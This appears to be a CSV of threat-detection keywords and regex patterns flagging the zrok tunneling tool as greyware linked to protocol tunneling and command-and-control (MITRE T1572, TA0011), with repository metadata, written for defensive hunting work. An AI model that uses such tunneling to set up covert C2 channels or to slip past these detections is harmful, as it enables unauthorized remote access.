"*zrok.environment.root.Load*",".{0,1000}zrok\.environment\.root\.Load.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok.proxy.v1*",".{0,1000}zrok\.proxy\.v1.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok.share.CreateShare(*",".{0,1000}zrok\.share\.CreateShare\(.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok_api.configuration*",".{0,1000}zrok_api\.configuration.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*ZROK_BACKEND_MODE*",".{0,1000}ZROK_BACKEND_MODE.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*ZROK_RESERVED_TOKEN*",".{0,1000}ZROK_RESERVED_TOKEN.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok-share.service*",".{0,1000}zrok\-share\.service.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrokSvcId=*",".{0,1000}zrokSvcId\=.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z"